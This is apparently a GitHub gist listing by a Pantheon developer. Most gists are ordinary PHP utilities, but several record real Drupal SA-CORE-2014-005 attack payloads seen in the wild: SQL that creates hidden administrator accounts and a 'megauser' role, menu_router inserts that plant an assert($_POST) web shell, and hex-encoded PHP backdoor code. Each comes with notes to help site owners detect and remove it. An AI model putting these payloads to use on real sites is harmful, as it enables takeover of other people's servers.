Josh Koenig joshkoenig

joshkoenig / pantheon_mass_update.php
Last active August 29, 2015 14:07
This is a simple PHP script that allows you to use Pantheon's Terminus CLI to update all your Drupal 7 sites. You can edit it if you would like to only deploy to the test env and double-check there.
<?php
// YOUR LOGIN INFO HERE:
$email = '';
$password = '';
// RUNNING IT FOR A PANTHEON ONE "ORGANIZATION": UNCOMMENT AND ADD YOUR UUID HERE
// $organization_uuid = 'some-org-uuid-here';
// helper function
function terminus_json($command) {
joshkoenig / bindata.md
Last active August 29, 2015 14:07
Remote code execution attempt: will insert this binary data into the menu_router table: #drupalsa05

0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d

This attack will add file_put_contents() as the access_callback in your menu_router table.

Subsequently, that path is used in an attempt to drop more exploit code.

Look in menu router for file_put_contents and remove it if found.

joshkoenig / sqli.sql
Created October 17, 2014 19:30
DRUPAL SA-CORE-2014-005 Exploit
# Another exploit we are re seeing on Pantheon
#
# Creates a "megauser" role with elevated permissions
#########################################
insert into users (uid,`name`,`pass`,status) select max(uid)+1,0x64727570616c646576 ,0x245324437274333435366767706141636d4e39447868367a674c66637736384c4e62697a5a6543726f2e4561574d33427a634b6a316835,1 from users;
insert into users_roles(uid,rid) select uid,1000 from users where name like 0x64727570616c646576;
INSERT INTO role (rid,name, weight) VALUES (1000,'megauser', '999')
INSERT INTO role_permission (rid, permission, module) VALUES (1000, 'administer blocks', 'block'),(1000, 'administer filters', 'filter'),(1000, 'bypass node access', 'node'),(1000, 'administer content types', 'node'),(1000, 'administer nodes', 'node'),(1000, 'access content overview', 'node'),(1000, 'access content', 'node'),(1000, 'view own unpublished content', 'node'),(1000, 'view revisions', 'node'),(1000, 'revert revisions', 'node'),(1000, 'delete revisions', 'node'),(1000, 'administer modules
joshkoenig / attack.sql
Created October 18, 2014 17:53
New menu_router attack for Drupal SA-CORE-2014-005
insert into menu_router (path,load_functions,to_arg_functions,description,access_callback,access_arguments) values (0x666176636f6e,0x00,0x00,0x00,0x617373657274,0x613a313a7b693a303b733a31393a224061737365727428245f504f53545b645d293b223b7d)
Translates to:
path: favcon
access_callback: assert
access_arguments: a:1:{i:0;s:19:"@assert($_POST[d]);";}
This appears to set the stage for a follow-up where there's an attack payload in the POST.
joshkoenig / gist:dbb543c02198330cbf87
Created October 19, 2014 20:46
Another SA-CORE-2014-005 attack: create the user "configure"
Another new attack:
insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'configure', '$S$DORA9TpsVNowA9zZF1sP26SpnV8OGc6pvLPOzUc.PrNd5zzXmL./' FROM users;insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'configure'), 3);
Will try to create a new user named "configure" with the "admin" role in a default Drupal install.
If you see something, say something.
joshkoenig / gist:fdd6a0b382c813ab7c33
Created October 20, 2014 16:05
Drupal SA-CORE-2014-005 "drplsys" user attack
Here's the latest attack we're seeing:
insert into users values (99992, 'drplsys', '$S$DeaaG6rBb1N73WEtKMW.cvIwP3f9/VP1M9ZJVu1mRiaH/bGu1bTK', '4585856489@mail.com', '', '', NULL,0,0,0,1,NULL,'',0,'',NULL);
Will create a fake user account. There doesn't appear to be a follow-on attack to use it for anything, yet.
Stay alert. Stay alive.
joshkoenig / removeds.php
Last active August 29, 2015 14:08
New Drupal SA-CORE-2014-005 attack creating menu callback at "removeds"
## Attack: INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`) VALUES ('removeds', '', '', 'removeds', 'preg_replace', [big hex blob])
# The big hex blob in the menu router translates into:
<?php
ini_set('output_buffering',0);
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
else $limit = get_cfg_var('max_execution_time');
if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
joshkoenig / verison_check.php
Last active August 29, 2015 14:17
How to make people aware of why something might not work.
<?php
# Making use of: http://php.net/manual/en/function.phpversion.php
#
# The idea is you'd stick this in your core class at the top to prevent execution
# on out-dated runtime environments.
#
# You could use 50300 if you only care about 5.3, but it's EOL too, so...
if (!defined('PHP_VERSION_ID') || PHP_VERSION_ID < 50400) {
# Inform users they need to upgrade their PHP version (or have their host do so)
# It'd be great if there was a common message or link to send users.
joshkoenig / server_name_and_port.php
Created April 10, 2015 19:58
SERVER_NAME and SERVER_PORT woes
<?php
/**
* Problem: there's code out there that relies on $_SERVER['SERVER_NAME'] and sometimes $_SERVER['SERVER_PORT']
* to construct urls, either to "call itself" or to create urls that are passed to third parties and expect to
* be routed back.
*
* This doesn't work well on Pantheon because those values describe the ephemeral container that
* handles the request rather than the site itself.
*
* In general, you don't want your code to rely on this, but if you are using some piece of contrib you may
joshkoenig / bgp_tweak.php
Created April 13, 2015 04:36
Background Process module tweakage
# ADDED AN "X-.*" TO THE END TO AVOID RE-SENDING CUSTOM HEADERS.
/**
* Remove headers we do not wish to pass on to the next request.
*
* @param $headers
* Headers to filter
* @return array
* Filtered headers
*/